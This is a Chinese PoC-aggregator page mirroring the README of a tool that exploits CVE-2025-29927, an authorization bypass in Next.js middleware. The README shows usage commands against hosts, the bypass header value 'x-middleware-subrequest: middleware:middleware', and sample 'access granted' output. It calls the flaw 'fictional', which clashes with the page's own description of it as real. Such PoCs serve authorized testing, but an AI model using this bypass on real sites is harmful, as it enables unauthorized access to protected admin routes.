POC详情: c29cf6446cc91ea0af1012f4d76c707ad9dac025

来源
https://github.com/m2hcz/PoC-for-Next.js-Middleware
关联漏洞
标题: Next.js 安全漏洞 (CVE-2025-29927)
描述:Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。
描述
> 🔓 Proof-of-Concept for a fictional Next.js middleware bypass (CVE-2025-29927) — craft sub-requests to test protected routes.
介绍
# PoC for Next.js Middleware Bypass (CVE-2025-29927)

[![Python Version](https://img.shields.io/badge/python-3.7%2B-blue.svg)](https://www.python.org/)
[![Status](https://img.shields.io/badge/status-active-brightgreen.svg)]()

This is a **proof-of-concept** for a **fictional** Next.js middleware bypass vulnerability (CVE-2025-29927). Use **only** for educational and authorized security research.

---

## 🚀 Features

| Feature             | Description                                                       |
| ------------------- | ----------------------------------------------------------------- |
| ✨ Color & Verbose   | Color-coded output; `-v` for detailed debug logs.                 |
| 📦 OOP Structure    | Class-based design for clarity and maintainability.               |
| 🌐 Proxy Support    | Route traffic through HTTP(S) proxies via `--proxy`.              |
| 🍪 Session Handling | Persistent `requests.Session` for cookies & connection reuse.     |
| 🚦 Redirect Control | No-follow-redirect by default; clearly detects pass vs. fail.     |
| 🛠 Custom Headers   | Override `User-Agent`, `x-middleware-subrequest`, or add headers. |

---

## ⚡ Installation

```bash
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt
```

> **Requires** Python 3.7+

---

## 🎯 Usage

```bash
python poc.py [options] <host>[:port]
```

| Option                      | Description                                                               |
| --------------------------- | ------------------------------------------------------------------------- |
| `-p, --path PATH`           | Protected route path (default: `/admin`)                                  |
| `-s, --scheme {http,https}` | Protocol (default: `http`)                                                |
| `--header HEADER`           | `x-middleware-subrequest` header value (default: `middleware:middleware`) |
| `-ua, --user-agent AGENT`   | Custom `User-Agent` (default: `Mozilla/5.0`)                              |
| `--proxy PROXY`             | HTTP(S) proxy URL (e.g., `http://127.0.0.1:8080`)                         |
| `-v, --verbose`             | Enable debug output                                                       |
| `-h, --help`                | Show this help message                                                    |

---

## 🔍 Examples

### 1. Basic Test

```bash
python poc.py localhost:3000
```

### 2. HTTPS & Custom Path

```bash
python poc.py example.com -s https -p /dashboard
```

### 3. Proxy & Verbose

```bash
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v
```

---

## ✅ Expected Output

**Success**

```
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…
```

**Failure**

```
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
```

---
文件快照

 [4.0K]  /data/pocs/c29cf6446cc91ea0af1012f4d76c707ad9dac025
├── [5.3K]  poc.py
└── [3.1K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。